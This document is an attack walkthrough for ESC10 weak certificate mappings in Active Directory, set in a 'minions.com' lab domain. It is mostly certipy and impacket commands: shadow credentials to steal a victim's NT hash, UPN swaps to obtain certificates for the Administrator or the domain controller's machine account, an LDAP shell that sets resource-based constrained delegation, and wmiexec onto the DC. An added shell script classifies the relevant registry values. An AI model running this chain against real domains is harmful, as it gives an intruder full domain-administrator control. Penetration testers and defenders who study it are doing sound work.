
ESC10 (weak certificate mappings)

Case 1

Reviewing registry keys as Administrator

bob$ python3 reg.py minions.com/'Administrator':'<pass>'@<IP_address> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\Kdc'

If the value StrongCertificateBindingEnforcement is REG_DWORD 0x0, enforcement is disabled: the KDC maps the certificate to an account by UPN alone and never checks the SID, so Case 1 applies. A value of 1 is compatibility mode and 2 is full enforcement; the steps below need 0.

Retrieve the victim's NT hash via Shadow Credentials (needs write access to <victim>'s msDS-KeyCredentialLink, e.g. GenericWrite over <victim>)

bob$ certipy shadow auto -u <user>@minions.com -p <pass> -account <victim>

Change the UPN of <victim> to the Administrator's

bob$ certipy account update -u <user>@minions.com -p <pass> -user <victim> -upn administrator@minions.com

Request a certificate as <victim> (authenticating with the NT hash from the previous step) from a template that allows client authentication, such as the default User template. The certificate carries the UPN administrator@minions.com, so Certipy saves it as administrator.pfx

bob$ certipy req -u <victim>@minions.com -hashes <victim_nt_hash> -ca <ca_name> -template <template_name>

Revert the UPN of <victim> so that only the Administrator account matches the certificate's UPN

bob$ certipy account update -u <user>@minions.com -p <pass> -user <victim> -upn <victim>@minions.com

Authenticate as the Administrator. With StrongCertificateBindingEnforcement at 0 the KDC maps the certificate by UPN alone, so PKINIT succeeds and Certipy returns the Administrator's TGT and NT hash

bob$ certipy auth -pfx administrator.pfx -domain minions.com -dc-ip <dc_ip_address>

Case 2

Query the SCHANNEL key with reg.py from Linux. Case 2 applies when CertificateMappingMethods is REG_DWORD 0x4 (UPN mapping enabled); the default value is 0x18

bob$ python3 reg.py minions.com/Administrator:'<pass>'@<IP_address> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL'
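The two registry queries above (the Kdc key for Case 1, the SCHANNEL key for Case 2) decide which chain applies. The following is an added example and not part of the original page: a small POSIX shell triage that reads impacket reg.py output and classifies the two values. The sample outputs are constructed to imitate reg.py's whitespace-separated Name/Type/Value lines, with made-up numbers; the registry paths and value names are the real ones. It goes a step beyond the page by treating CertificateMappingMethods as the bitmask it is, so a value such as 0x1c (defaults plus UPN mapping) is flagged as well as the exact 0x4.

```shell
#!/bin/sh
# ESC10 registry triage from reg.py output (added example, not from the
# original page). Value names and their meaning are the real ones the page
# queries; the sample output below is constructed and the numbers made up.

# Print the raw value (e.g. 0x4) of one REG_DWORD from reg.py output on
# stdin, or "missing" if the key does not carry that value.
reg_dword() {
    awk -v name="$1" '
        $1 == name && $2 == "REG_DWORD" { print $3; found = 1 }
        END { if (!found) print "missing" }'
}

# Case 1: HKLM\SYSTEM\CurrentControlSet\Services\Kdc
# StrongCertificateBindingEnforcement 0 = disabled (KDC maps by UPN alone,
# no SID check: the Case 1 chain works), 1 = compatibility, 2 = enforced.
kdc_case() {
    v=$(reg_dword StrongCertificateBindingEnforcement)
    if [ "$v" = missing ]; then
        echo unknown   # behaviour depends on the DC's patch level; check by hand
        return 0
    fi
    case "$(( $v ))" in
        0) echo case1 ;;
        1) echo compat ;;
        2) echo enforced ;;
        *) echo unknown ;;
    esac
}

# Case 2: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
# CertificateMappingMethods is a bitmask; bit 0x4 is UPN mapping, which is
# what the Case 2 chain abuses. The page's example value is exactly 0x4, but
# any value with that bit set (e.g. 0x1c = 0x18 default plus UPN) is just as
# affected, so the bit is tested rather than compared for equality.
schannel_case() {
    v=$(reg_dword CertificateMappingMethods)
    if [ "$v" = missing ]; then
        echo unknown
        return 0
    fi
    if [ $(( $v & 0x4 )) -ne 0 ]; then echo case2; else echo no-upn-mapping; fi
}

# Constructed sample outputs (not captured from a real DC).
KDC_WEAK='[*] Key Name: HKLM\SYSTEM\CurrentControlSet\Services\Kdc
    StrongCertificateBindingEnforcement  REG_DWORD  0x0'
KDC_ENFORCED='[*] Key Name: HKLM\SYSTEM\CurrentControlSet\Services\Kdc
    StrongCertificateBindingEnforcement  REG_DWORD  0x2'
SCHANNEL_UPN='[*] Key Name: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
    CertificateMappingMethods  REG_DWORD  0x4'
SCHANNEL_DEFAULT='[*] Key Name: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
    EventLogging  REG_DWORD  0x1
    CertificateMappingMethods  REG_DWORD  0x18'

# Usage with live data: pipe the real reg.py query into the classifier, e.g.
#   python3 reg.py minions.com/Administrator:'<pass>'@<IP> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\Kdc' | kdc_case
echo "Kdc (0x0):       $(printf '%s\n' "$KDC_WEAK" | kdc_case)"
echo "Kdc (0x2):       $(printf '%s\n' "$KDC_ENFORCED" | kdc_case)"
echo "SCHANNEL (0x4):  $(printf '%s\n' "$SCHANNEL_UPN" | schannel_case)"
echo "SCHANNEL (0x18): $(printf '%s\n' "$SCHANNEL_DEFAULT" | schannel_case)"
```

Both classifiers print a single token (case1, compat, enforced, case2, no-upn-mapping, unknown), so they slot into a larger enumeration script; "unknown" for a missing value is deliberate, because an absent value means the OS default applies and that default depends on the DC's patch level.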

Change the UPN of <victim> to match the DC machine account (the trailing $ is part of the machine account name)

bob$ certipy account update -u '<user>@minions.com' -p '<pass>' -user <victim> -upn '<dc_machine_name>$@minions.com'

Request a certificate as <victim>; because the UPN in the certificate is now <dc_machine_name>$@minions.com, Schannel maps it to the domain controller's machine account

bob$ certipy req -u <victim>@minions.com -hashes <hash_value> -ca <ca_name> -template <template_name>

Revert the UPN of <victim> (no trailing $ here, <victim> is a user account) so that only the DC machine account matches the certificate

bob$ certipy account update -u '<user>@minions.com' -p '<pass>' -user <victim> -upn '<victim>@minions.com'

Authenticate as the DC over Schannel (LDAPS) and, in the LDAP shell, create a computer account and grant it resource-based constrained delegation on the DC

bob$ certipy auth -pfx <dc_machine_name>.pfx -domain minions.com -dc-ip <dc_ip_address> -ldap-shell
# add_computer <new_account_name> <new_account_pass>
# set_rbcd <dc_machine_name>$ <new_account_name>$

Abusing RBCD to impersonate the Administrator (the SPN is the DC's host SPN, cifs/<dc_fqdn>, not the machine account's UPN)

bob$ impacket-getST -spn cifs/<dc_machine_name>.minions.com -impersonate Administrator -dc-ip <dc_ip_address> minions.com/'<new_account_name>$':<new_account_pass>

Connect using the Administrator service ticket (getST prints the name of the .ccache it wrote; older impacket releases save it as Administrator.ccache, newer ones name it after the impersonated user, SPN and domain, so use the printed filename)

bob$ export KRB5CCNAME=Administrator.ccache
bob$ impacket-wmiexec -k -no-pass <dc_machine_name>.minions.com